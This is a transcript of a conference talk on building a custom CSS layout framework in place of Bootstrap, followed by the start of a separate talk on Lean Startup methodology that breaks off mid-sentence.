if I look at the main class, the important thing here is that we have an overflow hidden. Now if I turn this off, you'll see that what we get is the footer now collapses in on, on the bottom of those. And if I hover over the main, you'll see that it actually has no, no appreciable height. So if we had a background image or something on here, it wouldn't show up. So having that overflow hidden or one of the other clear fix approaches is a way to fix this. Now you have sort of a very basic but still relatively common design layout for your application. You've got a header, navigation, two columns, and then a footer. Any questions? Okay. There we go. Okay. Next challenge we'll look at is that of columns. And this is probably more common than, than people coming to me asking about normal page layouts. Bootstrap and many of its friends try to, to be fairly robust with their, their grid layouts. And what we'll be building today isn't quite to that level, but I've found that I don't necessarily need all of the, the functions that Bootstrap's or its competitors grids give me. So we'll just look at sort of the, the essentials and what I need for probably 99 plus percent of my projects. So what we'll be doing to fix this particular developer challenge is looking at changing the way that the CSS Box model works. So let me just review that real quickly. The, the current CSS Box model goes something like this. We have a piece of content. It has a fixed width and height, for example. Then we add some padding on it. That wraps the content. Then we add a border on top of that that's going to wrap the padding and the content. And then finally we have a margin on the very ends. The problem is if you wanted to say, let's make this whole thing 500 pixels. And you apply 500 pixel width to it, it's only going to work for just the content part. Which means if you have a border or if you have padding that aren't regular pixels, there's no easy way to figure out how wide that element's going to be. We now have some additional elements or units of measure like VW for viewport height or width and VH for viewport height. These things vary depending on the size of your browser. There's almost no way to figure out without some JavaScript how wide an element's going to be when you include some of those units in things like borders, for example. So we can fix this, however. And we can do that with a trick called changing the box sizing. So now if we just set the box sizing property to border box, you'll see that what has happened is the entire thing squishes so that your content minus the margin, it's the only sticking point and we'll talk about that in a moment, is exactly the width that you want it to be. So if I said 500 pixels on this element now, it's going to take into account the width of the border and the width of the padding in addition to the width of the content itself. Now, a couple of years ago Paul Irish wrote a blog post where he recommended actually using this approach with the universal selector, little star. So every single element in your application would use this. I'm a huge fan of that. I actually do that on almost every one of the apps that I build. I didn't do that for these demos just to illustrate when it works and when it doesn't work. So if you download the code, I'm not a liar. I normally do use the universal selector for that. And it works great. It's really, really easy to be able to lay columns outside by side when you don't have to worry about things like margin and padding and border getting in the way. Now, if you'd like to know a little bit more about the box model, the video podcast A to Z CSS, which is already a fantastic video podcast if you haven't watched it. They have an episode specifically for the box model. So definitely check that out. It's only a few minutes long but really, really worth the time. So I have a brief demo about columns as well that I will bring up. There we go. There's that moment of panic again. So let me start up my real server again. There we go. So what we have here are five different sizes of columns. Arguably the first one's not really a separate size of column but nonetheless it's in there for illustrative purposes. And they're all fitting very nicely side by side. No problems at all. And I didn't have to use bootstrap. I didn't have to use anything else. But what I did use are some CSS select or some CSS rules that made this very, very easy to work with. So the first one's fairly obvious. I just give it 100% width. And I also will, you'll notice that there's a little bit of space around these guys. And that's what I mentioned, the margin thing. I actually try to avoid using margins with columns because the box sizing model changes that we've done don't respect that. So if I put a little bit of margin, what you may find out is that your columns don't actually line up exactly. So if I put two columns with 50% with no margin, great. They'll fit next to each other, no problem. But if I put some margin on there, one of them will wrap because the margin widths aren't included in the calculations for the width. So I keep margins out of it. But what you can do is put an inner element and then either add some margin on the inner element or what I've done here is I added some padding on this outer element. So if I make this larger, you'll see that we just get a little bit more padding between our columns. Sometimes people call this gutters in the space between these two columns. I believe it's actually called alleyways. If you've worked with any kind of print layout or print typography, page layout, things like that, though normally people look at me strange and act like I'm some sort of column hipster if I call it alleyways. So gutter works just fine. But what we've done is added a little bit bigger of a gutter just by adding some additional padding on those columns. So let's take a look at some of the code that makes this work. And this is some of the code that will be shared later. So don't worry if you don't feel like writing it down right now. So what we have is our universal selector inside this particular part of the app. And I've simply applied the border box sizing to everything within this part two. This is one of the cool features of SAS, by the way, is the ability to nest these CSS selectors. And we'll see a couple more examples of how SAS can help us in just a moment. But what we have is our columns in general are floated to the left so that everything lines up just right. And then we've added our padding here if we wanted to change the gutter, we certainly could. And then I've got a couple of rules that specify widths for CSS. So one of them is going to be our sort of full column, if you will, 100% width. Because these things are floated, if I don't provide 100% width, as I mentioned earlier, they'll collapse on themselves if the width isn't specified. So I always have at least something that's sort of like full width column. And then I've got a couple of other columns that are just broken up by percentages. And if you make sure that your percentage is at least in some form or fashion lined up to be 100%, then you're good. The only difficult parts is if you've got some columns that are, say, 33 and a third. It's very difficult to get the threes out to a certain number. Someone once told me that browsers only respect three decimal places for values like this. I don't know if that's true or not, but it at least works well in my experience. So I try to keep these things that are sort of the odd roundings to a little bit of a minimum. What you could do if you wanted to do in thirds or something is just put two of them as 33%, and maybe the last one is 34%. This works actually well for me, though. You can see everything lines up very nicely. The green ones are the ones that are 33% wide. These blue ones are 25%, and then finally the purple ones are 20%. Now just the fact that we have all of these arranged like this doesn't mean they have to be. If I wanted to drag one of these 25% ones, for example, up next to this 50% one, and then let me grab another one, you can see that we can still compose our layouts in whatever flexible manner we might want to. And I haven't actually added or removed any rows, which last time I worked with Bootstrap, there were a lot of rows involved in some of these things. I don't have any rows here. All of this is just within one section, and we've used the browser's own native ability to flow things from one side or from one line to a next if they're floated to take advantage of our column layouts. So I have a 50% column next to 25% columns. No additional work required. If I wanted to have a number of these different widths, I could certainly do that as well. And that's actually all the code that we needed to make this happen. Everything else that's in these options that we've imported at the top is actually for visual appearance, its colors and typography and stuff. But the column information itself is just what you see right here. Fairly straightforward, and as long as you're not targeting really, really antiquated browsers, everything here should work just fine. I think IE7 has some problems with box sizing as it is, and if memory serves, Firefox requires a browser, a vendor prefix for this, but all of the browsers are working just fine. Ironically, the very old versions of Internet Explorer actually had this type of box sizing model, and then Microsoft changed it probably because they were getting heat for it just like everything else. But actually, even back then, I believe that IE had it right, they got the box model right to begin with, and this is kind of your IE reset. So if you want to give Microsoft any creds for CSS, go ahead and give them some for this because it really is a superior way of representing the box model. All right. So if you'd like to learn a little bit more about columns, not only in CSS, but just in general, there are a couple of links that I've provided here again. The slides will be available. There's a link at the end of the talk, so don't necessarily worry about taking some pictures, but some good information there. Unfortunately, one of the problems that we sometimes get into with this is we might have a layout of our CSS that goes something like this, where in this case, I only have nine directives for column widths, but what if there's like five ups or something that has seven or 20 or however many columns you might want? You might end up with a lot of different CSS selectors, and you might have to end up doing a lot of math. Fortunately, we can actually use some of the built-in features of SAS or LAS or one of your other CSS preprocessors of choice to cut down on this. Here's what I mean. This is what we had before, and we can actually simplify that to this. Now, let me walk through this real quick. Oops. That's not what I wanted to do. Ah, laser pointer. Awesome. So the first thing that we do is define the number of columns that we want in this particular layout. This also actually means that if you wanted to change the number of columns away from what one of the CSS framework standards gives you, you can easily do that. Say you wanted a five-column layout. No problem. It's in a CSS variable. And by changing this, we now get a different number of iterations through this loop. Now, I won't go into too many details about how this loop works. If you're familiar with any kind of loops in any other programming language, they work very similarly. We have a loop. We have an index property here, and then we're going from the number one through the number of columns minus one. The only reason for that is so that we don't get 100% width, but probably want the 100% width, so you could just say from one through dollars on columns and get the full number. And then what we're doing here is creating a CSS class that has that variable in it. So it actually has the index there. So we'll see column dash one, column dash two, column dash three, and so forth. And then we have some simple math that says take the full width of the page or whatever it might be, 100%. Divide it by the number of columns, multiply that by the span that we want, and then give us the value. So if we wanted something that spanned five columns in a ten column layout, do 100% divided by ten times five, 50%. Now, if you wanted to kind of play around with these a little bit more, there's a tool that I recommend called Sassmeister, and I actually already have a lot of this in place. But you can see you put in some sass on the left, and then it gives you the output CSS on the right. So if we wanted to see what this might look like with seven columns, we can just do that. And then a few seconds later, we're given the exact numbers. And you can see it, as I mentioned earlier, decimals, I don't know, seven columns might not be exactly what you want to do. But if you wanted to do something like 14 columns, which probably isn't any better than seven now that I think about it, 16 columns is much better. So you get some fairly standard numbers, and I've now changed the number of columns that I'm using in my site just by changing one variable in Sass. Really, really easy to work with. And then, as I mentioned earlier, both Broccoli and Harp and many other tools will do this sort of compilation for you. But Sassmeister is a nice little playground on the Internet, so if you want to make sure you have your syntax right, or maybe you just wanted to do this once and copy and paste the output CSS that's on the right, I don't have to worry about it anymore. Okay. If you'd like to know more about some of the other Sass functions, there's a link here, ndc-bb-sass. There's a lot to it, and there are even a number of sort of frameworks that are built on top of Sass, not necessarily CSS frameworks, but frameworks that extend the API of Sass that give you even more functionality. So the next challenge that we want to talk about is that of multiple screens. So responsive design is really big right now. What if I want something that looks just as good on my phone as it might on one of these larger screens or even a huge screen like this? What do we do? So we can use the concept of media queries in our CSS, and if you're paying attention earlier, you might have noticed I sort of scooted some media queries down off the page so you wouldn't look at them. But media queries are the ideal way of dealing with multiple screens. So the syntax is relatively straightforward. We simply use an app media directive, and we provide some sort of CSS property that lets us determine, it's basically a Boolean test, is this true or not. And if it is true, then everything that you see in this comment here, all the CSS styles will be applied to your page. So let's see what that looks like. I'm actually going to refresh this because these grids are already responsive, and we can demo that. If I drag this over, you'll see the columns will start to squish. And then once I reach 360 pixels, watch the blue ones because they will now sort of restructure, and they are now in a completely different configuration than we had before. So there's two things that work here. One is actually some rules that I applied to the section element. This is the other way, the non-media query way, if you will, of applying responsive design. That is to use minimum and maximum widths, and then use a width of 100%. So these minimum and max widths are going to clamp both sides of the size of this thing, and then width 100% means between those two values, use up as much space as you can. So it will never be more than 640 pixels wide, and it will never be less than 128 pixels wide, but anything in between it's going to stretch or squish to accommodate however much space might be available. However, we also need to address the problem of what happens if things get too small, and that's where our media queries come in. So let me scroll down to this secret part down at the bottom. So as we saw in the slide, all we need is an app media directive, and then some CSS selectors, in this case, it's saying if the width of the site is less than or equal to 360 pixels. So if its maximum width is 360 pixels, then apply these additional CSS properties. In this case, I wanted to change the size of the four columns so that each one would actually be 50% instead of simply 25%. Now, any CSS things will work in here, so you don't necessarily have to stick to just things like widths. But I have found that things like changing colors based on different sizes of devices may not be the most ideal scenario, but I don't want to be a designer for you, so if that works out for you, great, have at it. So this is really, those two approaches are really all that you really need to do some very basic but fairly powerful responsive design with things like column layouts. Again, nice and fluid, and it works very well. And one other thing I wanted to point out, if you're a Chrome user, and if you'd like to do some of this stuff, I would suggest at least checking it out if you haven't already. Chrome now has a new emulation tab down here by the console that allows you to emulate the screen sizes of particular devices. So I can even say, let me see what this looks like as an iPhone 4, and I may have to refresh the page for it to work. I've probably done something else wonky. Well, regardless, when this normally works, you'll actually see that it has reduced the size of my viewport to that of the iPhone 4 or any of the other devices. And my cursor has also changed to this little, little circle thing, and that is the Chrome option of emulating touch events. So when I click, the browser is actually not going to get a click event, it's now going to get a touch start and touch end event. So if you're doing any kind of responsive development, check this out. Obviously not if you're trying to do some demos for something like this, because that may not work out well. Okay. Turn off this. Okay. So the last challenge we're going to look at is laying out forms on a page. I mentioned earlier most of my time is spent doing business applications. Your mileage may vary on that, but assuming you're doing something similar, you've probably run into the problems of dealing with form inputs. Browsers and different operating systems like to render these slightly differently. So how can you resolve that? So we're going to use a concept called pseudo elements. And this is an interesting way to inject additional elements into your page that may not necessarily be represented in HTML, but they're still stuck to attached to regular elements. So let me show you what I mean. Let's assume that we've got a simple radio button, and maybe we don't like the default style, so we want to do something a little bit different with it. So the first thing that we're going to do is hide it completely. This may seem a little unintuitive. How can someone interact with it if it's completely hidden? But by using visibility as hidden, we can still click on it. It still becomes a clickable element. If we use display none, it would collapse up into a zero by zero pixel size if you will, and nobody could click on it anymore. But by doing visibility hidden, the element still takes up space on the page, and it can receive click events, so you can turn it on and off if it's a check box or select multiples if it's a radio. Now I'm going to use a pseudo selector, a pseudo element. In this case, it's before. There's before and after, and we'll see after in just a moment. But this gives you a brand new element to style and work with as you please. So what I've done here is created a new element, given it a display block so it takes up a fixed portion of the page, and I can style it with width and height. I've given it a width and height, made it green, and probably have given it a little bit of a border radius so it has a nice, nice round appearance. Now you'll notice that the other element is still there. It's represented by the dotted purple lines behind it. But what we've done is replaced it with our new element that we can style just like it's any other div. So if you don't like the normal appearance of some of the check boxes and radio buttons and so forth, you can use this approach to sort of sweep those under the covers and replace it with a visual style that you prefer. Now I'm going to sort of combine some pseudo-selectors here. So bear with me. The checked option is available for check boxes and radio buttons and indicates what happens or how the element appears when whatever option it is is selected. So if the check box has a check in it or if the radio button is selected itself. So what I've done is simply added a little text check mark that you can get from somewhere in the ASCII character sheet. I could also have put some additional styling or something like that. It's not limited to just putting characters in there. Now I have my own custom-styled check box or radio button. And I didn't really have to do a ton of work with it. So let's see what this code looks like. I feel like it's getting longer as black every time. Is it just me? Okay. So here we have a couple of examples of what we're using with pseudo-elements and then a little bonus example with select boxes as well. So what we've got are, let me close down this. We have a simple check box here that I've styled to use a square instead of the normal OS 10 default. And we've got a couple of radio buttons here that I've used a similar visual treatment to. So if I expand this and actually look at what this guy looks like, we have a standard check box and we've set its visibility to hidden. So it's still there. It may be a little difficult to see, but we actually do have a little blue box representing the part of that element that's actually there. It's still on the page. We haven't completely removed it. And then if you expand this, and this is an option in Chrome, but I believe many of the other browsers have this as well, you can see the little pseudo-selectors that we've actually added to this. And if I click on it, you can see the styles that are associated. So what I've done is set a border on it. I have a background color, a specific width and height, normal CSS properties. I could do whatever I wanted to. If I wanted to put a CSS3 transform, so it's doing some sort of 3D spin effect, I could do that as well. Probably not the best idea, but it is possible. This is just a regular element that you can style. The only requirement is to provide this content property. Now, the content property is sort of just what it kind of sounds like. Elements have content within them. Normally, it's something like text. So in this case, I have to at least put an empty string in there, but I could put other content if I wanted to. And you can see it actually shows up on the page here. By the way, if you're doing any sort of form layouts and want to put colons on your labels, instead of remembering to put colons on all your labels, you can use an after pseudo and add the content as just a colon. And then whatever the label text is, you'll get a colon on the end. So this is just regular text. I just happen to be using it as blank so that nothing shows up, but it is required for before and after pseudo selectors. And then the after pseudo selector, very similar. I'm just styling a little black box. I could change it to whatever color I wanted to, and you'll see that it shows up maybe a little bit more visually appealing depending on your persuasions than the black is. But nonetheless, regular CSS element, we can style it however we might want to. Now, our check boxes are very similar. I have radio buttons, I should say. We have a typicals radio, and I've got a before selector on it. And you can see when I select this one, we now have this after selector. And that's by virtue of the fact that we're using this combined colon checked selector as well as the after. So we've completely replaced the default view that the browser gives us of each of these input elements with our own custom styling. And the last one I'll mention is the drop down list. This, I believe, is still a little bit tricky in some versions of Windows and Internet Explorer, but at least for most of the modern browsers, you can actually style it directly if you don't like the default styles. So I've just killed all of the normal appearance with this WebKit appearance none. There's similar techniques in Firefox and IE, but it still behaves just like a regular selection box. I can choose different options here and they show up. But I've chosen a different typeface, some background colors, borders, things of that nature. Really easy to lay all of these form items out. And because you now have complete control over their width and height, it's a lot easier to put those in the normal flow of a document. One of the problems that I had first getting started with HTML is things like radio buttons wouldn't necessarily be the same height as the labels for the radio buttons. This is an easy way to get around that because you can explicitly set widths and heights and other layout properties for all of your form elements. Oops, somebody's got an AirPlay display in here. Maybe after this I'll hijack their display and we'll see what happens. Okay, any questions on the challenges that we've seen so far before we move on? Which is really just an excuse for me to get some more water. Okay. Yes? No, that's part of SAS and many other CSS preprocessors will have that. There are a number of different functions that are provided by those tools, but the for loop is one that's just in SAS right now. The variables are, however, coming to CSS. I don't know if it's the same syntax, but future versions of CSS will have abilities to assign variables and stuff like that, but the for loop is definitely a SAS convention. Great question. Okay. One of the other things that Bootstrap provides in addition to just regular CSS layouts is a little bit of behavior too. I mean, there's tabs, there's all sorts of things like that. It's not just columns and different page layouts and so forth. So I wanted to take a few moments and talk about how we can still bring some of those things in without having to rely very heavily on Bootstrap. Now, I will say this is where I typically will diverge from the write it yourself approach. I don't want to build state pickers. I don't want to build tab strips. A lot of that stuff is just, it's more JavaScript than I like to look at. I like to focus on building features with JavaScript. Fortunately, there are some other companies that are more than happy to take your money in exchange for giving you some of these things. One of those is Kendo UI, though I have to say they just did something absolutely fantastic. They have open sourced a number of their controls and I believe the vast majority of them are available for free. And I think they're making their money off of some support agreements or something. So if you haven't tried Kendo maybe because of its price, now is a great time. But ultimately the Kendo UI suite is a set of some of these controls. So date pickers, modal windows, tab strips, all the sorts of things that you'd expect from Bootstrap. There's actually even quite a few more as well. And if you're really interested, Kendo has its own mobile application development framework that you can build an entire mobile app just with Kendo. Pretty amazing series of tools, but we'll definitely handle a lot of the common cases for things like I mentioned the modal windows and stuff like that for you. Things that Bootstrap also provides, but since we kind of have gotten rid of Bootstrap so far or its competitors, we don't want to leave you guys hanging without any kind of behavior to your site. But having said that, you don't always need a lot of JavaScript for that. One of the things that Jonathan Snook actually taught me many years ago was at one of his workshops is this concept of stateful CSS where you can actually use CSS classes to modify the state of your application. So instead of using a JavaScript control for tabs, you can actually do that in CSS only. If you'd like to know more, I have a blog series about this and have a few examples of how to do this, but it's ultimately using some CSS and a very, very minimal, if not no, JavaScript to replicate some of the same features that you might expect from a JavaScript app. In fact, let me bring one up for you now as a quick example. So this is a tab control, so here's our HTML. This is, I think this is also one of the links that's available later, so don't necessarily worry about writing down URLs or anything, but we actually have the ability to switch between three different pieces of content and this is entirely CSS. There's no JavaScript in here at all, and yet we effectively have a little tab strip. So it's a little bit faster because it's all CSS, none of it's JavaScript, and you don't even need to look at something like Kendo, much less Bootstrap if you want something as simple as a tab control. And I can't see my title bar. There it is. Okay. Now one of the futures of where the web is heading is with this concept of web components. Web components are basically just groups, fragments of HTML and CSS and some JavaScript that you can sort of put together and apply in different places on a site. It's kind of an abstraction for common interface elements. So you might put a tab strip in one of those. You might put your own custom date picker or even a list of objects. Bootstrap provides these to an extent, but Bootstrap's example of these components are really just kind of pre-made HTML fragments that you have to copy and paste yourself. The CSS selector example that we saw at the very beginning is an example of one of these components where they just have some CSS that's very tightly coupled to the HTML implementation. And that's kind of their idea of components. But the Polymer project by Google is one attempt at bringing web components into what we can use now because web components are a future spec. They're not out there just yet. So the idea behind it is to take some HTML that looks something like this. So we've got a modal and maybe some header text and some content to it. If you have a lot of modals in your application, you probably have this code duplicated in a lot of different places. And Polymer allows you to abstract that duplication and make something that looks an awful lot like this. So you're effectively creating new HTML elements and you can have attributes on them. You can have content on them. And then when they're rendered to the browser, it's actually split back up into its component HTML. Now, if you happen to be using Ember, Ember actually designed its components very, very closely with the web component spec. I'm not an Angular user, so I can't speak to that. But if you have some experience, I'd love to hear about it. But it does very much the same thing. In fact, really the only difference is Ember uses the handlebars templating language. So there's curly braces instead of angled brackets. But the code is exactly identical between this and what Polymer allows you to use. Oh, I also use single quotes because I'm a JavaScript tipster, so I have to use single quotes. But you know, these web components are definitely coming down. They're a great way of abstracting some of these commonalities within your application. So if you're interested in some of that, Polymer Project is definitely something to check out. I only have a few minutes left and I want to see if we can get some time for questions. But I wanted to briefly touch on visual style as well because I think I'd be remiss in if I was dissing Bootstrap's visual design earlier, I can't just leave you guys hanging with no additional resources for some of those. So some of the things that some of the sites that I normally use for finding inspiration on visual design and stuff like that, one of them are Web Fonts collections. So Google has one. Adobe recently, I don't know if recently, Adobe partnered with Typekit to release some of these Adobe Edge Web Fonts. There's another one called Brick.im, I believe. A lot of different Web Fonts. This one is especially nice. The tool that allows you to select the different Web Fonts for use is fairly robust and pretty nice. And a great way to look for inspiration on using different typefaces and stuff for your designs. The other one and one that I'd love to demo if I had some time, if I don't get to it, come talk to me afterward because this is a pretty cool tool. It's also from Adobe called Cooler or Cueller. I'm not entirely sure how to pronounce it. But it allows you to create color schemes based off of maybe photographs or just the color wheel. So if you're looking to just find some pretty good colors to use for your designs, this is a great place to start. If you're looking for something a little more constrained, maybe less free form than Adobe, check out this site DesignSeeds.com. Every day or every couple of days, they'll take photographs and pull out key colors from those photographs and release them as color collections. These things are amazing. This one was actually from this morning. And it's just a great little example of what they've got there and some amazing colors, really, really pretty stuff that they've got there. And also the photography is pretty good too, so if you just like photographs, they've got some good ones there. And the last thing that I wanted to talk about is an additional feature of SAS that I found very useful with global variables and colors and so forth. So say that I want to build an entire site off of one or two particular colors. Well, there's a couple of approaches that I like to take. One is kind of abstracting some of these colors. So you'll notice that we have our color called olive, but we also have a headings variable that's assigned the same value as olive. And this is so that if I ever wanted to change the base color, I don't have to go do a find and replace for olive. I can just change it in this one place and then all of our headings now have the new color. So having that light little level of abstraction is a great way of keeping your design independent of some of the color choices that you use. But there's also some interesting CSS functions that allow you to do some cool things as well. So this is, again, a SAS feature, but I believe less and many other CSS processors, preprocessors have it. What I'm doing is calling this lighten function and then passing in this normal headings color saying lighten it up by about 10% or so. And so the resulting color is actually quite a bit lighter and I can use that elsewhere in my site. What's more is if I wanted to change the base color, I could do that and everything would sort of cascade, if you will, pun intended, to all of the different colors that I've defined. There are a number of these different color functions. There's lightening, lighting, lighten, excuse me, darken. And my favorite is mix where you can actually mix multiple colors together. Check out the link that I mentioned earlier and there's a number of these functions that are available there. So with that, I want to go ahead and wrap up. Like I said, I wanted to leave a couple of minutes for questions. If you'd like to look at the slides or the code, it's these two. I told you there's a lot of NDC BB links. So dash slides are these slides and dash code is the code example. It's on GitHub. If you'd like to submit a pull request or something, if you found a more interesting way of doing some of this stuff with maybe even less CSS, please, I'd love to hear it. The last thing that I'll say is please remember the feedback. The conference organizers appreciate knowing how badly I sucked today. So if you'd, just while you're walking out, just drop a card to the appropriate color. But I appreciate all of your time. We've got a, like I said, 30 seconds or so for questions. And I know everybody's really interested in getting to lunch. So if you want to find me around lunch, we can continue chatting there. And then don't forget the hashtag better bootstrap if you'd like to continue the discussion or just tweet at me directly at Tim G. Thomas. And I very much appreciate your time and hope you have a great rest of the conference. So you're dismissed to lunch. But if anyone would like to stay for questions, I'm up here. Thanks. There. You
The influence of Twitter's Bootstrap framework is undeniable, but it brings with it a steep learning curve and a great many features the average web app simply doesn't need. In this session, you'll learn how easy it is to build your own web framework from the ground up, so you can tailor it to your—and only your—needs. We'll start with a solid CSS foundation, add on some component scaffolding for your most common use cases, and top it off by discussing how to share your new web framework with your team. Grab your hard hat and come learn how to build a better Bootstrap!
10.5446/50646 (DOI)
Let me start very, very simply. Why are you here? Are you here to learn about Lean Startup? What do you know about Lean Startup? Why are you here? Learn about Lean Startup? What about you guys? Same? Okay, what do you know about Lean Startup so far? Nothing. Awesome. Who knows? I've heard the words, build, measure, learn. Sounds interesting. Most of you. How many people have read the book? How many of you have done something in terms of Lean Startup? I've implemented a smoke test or a concierge test, something like this. Okay, not so many of you. All right. Sounds good. Let me ask another couple of questions. How many of you are in a startup right now or planning to do a startup? Okay, about half of you. How many are in a corporation of some type? Okay. How many of you would like to be doing innovation inside that corporation while keeping your nice salaries? Okay, most of you. Just checking. So that's good. I have no bias towards startup. I've been in Silicon Valley for the past five years, so I'm surrounded by startup people who always just say, yeah, quit your job and do a startup. I don't think that's necessary. We're seeing more and more corporations these days doing really innovative things, creating accelerator programs, creating innovative products within their company. And it's actually quite refreshing to see. It makes me feel like there's hope for the future. Okay, let's get to the talk. I am going to ask you guys to play part of the role here. So my role here as the speaker is to tell you what I see as the truth, what I've seen around me in corporations and startups. Your role here is to call me on my bullshit. Okay? If I say something that doesn't make sense, it's your responsibility to stand up and ask me a question about that or tell me why I'm wrong. Agreed? Yes? Okay, good. So my name is Tristan Kromer. I live in Silicon Valley. I spend about half of my time working with corporate programs encouraging entrepreneurship, teaching them how to move as quickly as a startup. I spend the rest of my time. That's the part where I get paid. The part where I don't get paid is working with startups, which is much more fun to me, but startups as you all know have absolutely no money. So we do it purely just because it's entertaining and enjoyable. I run an organization called Lean Startup Circle. It's a grassroots decentralized organization that operates in about 80, over 80 cities around the world, including, I think there is one here in Oslo, Silicon Valley, obviously, as far as Tokyo, Beijing. We even have one in Ramallah, Palestine, and five in Saudi Arabia, which is crazy to me that there are actually more groups in Saudi Arabia than there are in Germany. So that's been very exciting to me to hear that everybody is trying to start innovate. So since most people here are a little bit unfamiliar with Lean Startup, let me start kind of with the basics here. What is a startup? What's the job of a startup? That's not a rhetorical question. What's a startup? A business that's just starting, but you're not allowed to use the same word as in the word that you're trying to define. What's the job of a startup? What's the purpose? Startup is a business where there's a lot of risk. I buy that. That sounds good. Any other comments, additions? Create customers. That's a good definition, too. I like that one. That's really good. All of those sound good to me. I like that. What's important to realize is that the job of the startup is not this, right? This is fun. This is the Norwegian Developers Conference, so I assume most of us here are developers. This is what I enjoy to do. I'm not a very good developer, but I'm very happy, like, doodling away at two in the morning and trying to build something interesting. But this isn't the job of a startup. The startup is not there to produce code. The job of a startup is also not there to tinker with things. We've got a lot of hardware startups. We've got robotic startups. The job of a startup is not to build things. Similarly, if you're a business person, the job of a startup is not to create a business plan. This is not functional. This does not create customers, as you said. Job of a startup is not to do financial modeling. The job of a startup is not if you're a designer to create pixels. Having a pretty web page is not the job of a startup. The job of a startup is not to build a product, but to understand and create a business model, a sustainable business model that actually will drive a product to customers. Product has no value unless somebody actually wants it, period. So the job of a startup is not to produce product, but to produce a business model that can sustain itself. Startups also have one very familiar characteristic. As you said, somebody said they were just starting up. They have a lot of risk. As a startup, you have a certain amount of time before you run out of money. This is a finite window to create a business model. The standard definition of this is a runway. Runway is very simple. It's the amount of cash you have on hand divided by your burn rate, how much you spend, and that equals your runway, how much time you have before you go bankrupt. So you have a certain amount of time. You have the amount of time that an investor or your business unit manager, if you're inside a corporation, has that they give you the patience before they shut you down. Similarly, this can also be the amount of time that you have before your mom gets tired of you working in the guest room and kicks you out of the house. So that's your runway. The only issue with this for a startup is that time does not equal learning. If your job as a startup is to produce a business model, then the amount of time you spend coding or writing a business plan or producing financial projections five years in the future has absolutely nothing to do with you learning about your market, learning about your business model. Time does not equal learning. What does equal learning is iterations. We learn about the product by actually getting feedback from customers. If our job is to create customers, then any amount of building that we do, no matter how good your code is, no matter how skillful you are, does not mean anything. Doesn't help you create a business. What helps you create a business is building something, measuring to see whether the customer likes that, whether the customer is willing to pay anything, and then getting feedback on that. So this is the bumper sticker of Lean Startup. If nobody knows anything about Lean Startup, this is generally what they've seen. Have you guys seen this before? Build, measure, learn? It's pretty common, right? And this is nothing new. This has existed for thousands of years. Designers call this think, make, check. The American Air Force calls this UDA, Observe, Orient, Decide, and Act. Deming, this business guy calls it, I can't even remember, Decide, Plan, Act, something like this. But the point of this is not just to build something and then learn from something, it's to go as fast as possible. So how long does it take you guys to go to market? Let's hear from the corporate guys. How long does it take you from the point where you have an idea to get it to customers and get feedback on it? How long? There were a lot of corporate hands over here. How long? How much? Two months and still counting. Two months and still counting. That's actually not bad. Normally I hear like nine to 12 months. So recently I've been working with a corporation in Switzerland and they're generally taking nine to 12 months just to build it. And then it's handed over to the poor marketing department who's like, what's this? Why did we build this? What is the purpose of this? Who are the customers? We're not entirely sure. So yeah, typically quite a long time. What we're seeing is we have things like, let me rephrase, the important part here is going quickly around this cycle. So we can take a company and we can give them $2 million and say it's going to cost you $1 million a year and it's going to take you one year to build a product. How many chances do you have to learn if your product is good or not? Also not a rhetorical question. How many chances? Just one. Were you at my talk yesterday? No. That's a good answer. Just one. Normally people say two, but at the end of the second year you're bankrupt. Even if you launch at that point, you have no chance to learn anything. So you have one chance. Nowadays we're building products much faster. If we can take a product with a one month runway and run one day iterations, so actually build something, not the entire thing, but build something that gives us market feedback in one day, we actually have 27, 28, 29 chances to learn something. So a one month runway beats a one year or two year runway every single time. And we have companies doing this now. Who here has been to a start up weekend? Just one person. Really? Okay. Everybody turn around, get this guy's phone number. How long did it take you to build your prototype at start up weekend? Couple of hours. And this is getting more and more typical. So David Weakley built PB Wiki, which became PB Works, a very successful company. He built it in an all nighter. That was his first version. Most start up weekend companies generally take anywhere up to 54 hours to build their product and actually get feedback from customers. This is the speed that we're going now. And the developer tools that we have access to are such that even a business person can hack together a prototype amazingly quickly. You guys are becoming somewhat obsolete. You're building yourself out of a job. I started coding in high school. I ran a bulletin board system under Makos, which is a programming language that nobody, I don't even know what it stands for anymore. The only thing I remember it stood for is more of a crappy operating system. That was the acronym. I stopped coding for 15 years because I had a choice. I was like, either I really focus on coding or I go play my guitar. I chose to go play my guitar for a few years. I stopped coding. 15 years later, I was traveling abroad. I moved back to Silicon Valley. I wanted to do a start up. I was like, well, I might as well learn some code. I got a friend to teach me Ruby on Rails. Two months later, I was building my own prototypes. Somebody who hadn't coded at all can build a fully fledged prototype in a matter of days or weeks. All of this stuff is becoming quickly commoditized, unfortunately. And sure, we still have some skills that are valuable, like how to scale. You certainly can't do something as impressive as Twitter and Ruby on Rails. You might have to throw a little scholar or Java in there. But ultimately, our ability to deliver value, if we want to create a start up, is not just in coding anymore. I'm going to tell you some other stories about some of the people who are hacking together prototypes and actually earning revenue from day one without any substantial amount of effort or coding. So back to my narrative here. So cache on hand divided by run rate, your burn rate does not equal your runway. What matters is the number of iterations you have. Because ultimately, the time you spend building stuff increases the risk, bless you, increases the risk you have that you're actually building the wrong stuff. It's a very linear graph. The more time you spend building stuff, the greater the chance that you're actually building something that nobody cares about. What mitigates this risk, and this is the risk, right? If you screw up, you're back to square one from zero. But what matters here is that we can now break up your big idea into tons of little small ideas systematically testing each part of your business model. And if you do make a mistake, it's not such a big deal. You maybe lose a day or a month or a week, not an entire year of your life. And of course, the general problem with this kind of the build it and they will come methodology is that we all know feature creep both within and outside of a corporation. We all get new ideas. We're creative people. We come up with new ideas. And the risk as we go on and proceed is that our feature creep basically goes to infinity and we never, ever, ever, ever release. We just continually try and be perfect. And because we don't want to be embarrassed by putting out something that's not perfect, because it's our reputation, we're afraid. We're afraid that somebody won't like our product, that somebody will tell us that our baby is ugly. We hide it away and never release it. So what's the alternative? The alternative nowadays is something that's become kind of a horrible buzzword. Everybody knows MVP, minimum viable product. What's an MVP? What's the definition of an MVP? Smallest thing you can build to prove an idea. I like that. The definition I like even more is an overhype buzzword that means nothing. That's actually my preferred definition nowadays. Most people think it means that I think is a wonderful definition. Kind of the definition somebody gave me last night was a prototype. It's just a prototype. That's not what it is. This is not an MVP. It's not this incredibly complicated thing to do, an incredibly simple task. An MVP is exactly as you say. Eric Ries defines an MVP as that version of a new product which allows a team to collect the maximum amount of validated learning about customers with the least effort. So it's something like this. This is a real company putting out an MVP. Actually don't like this MVP entirely, but it's pretty good for what it is. It's a very good test. What we have here is notify me when LSAT games become available. Do you guys know what LSAT is? LSAT is a test that you have 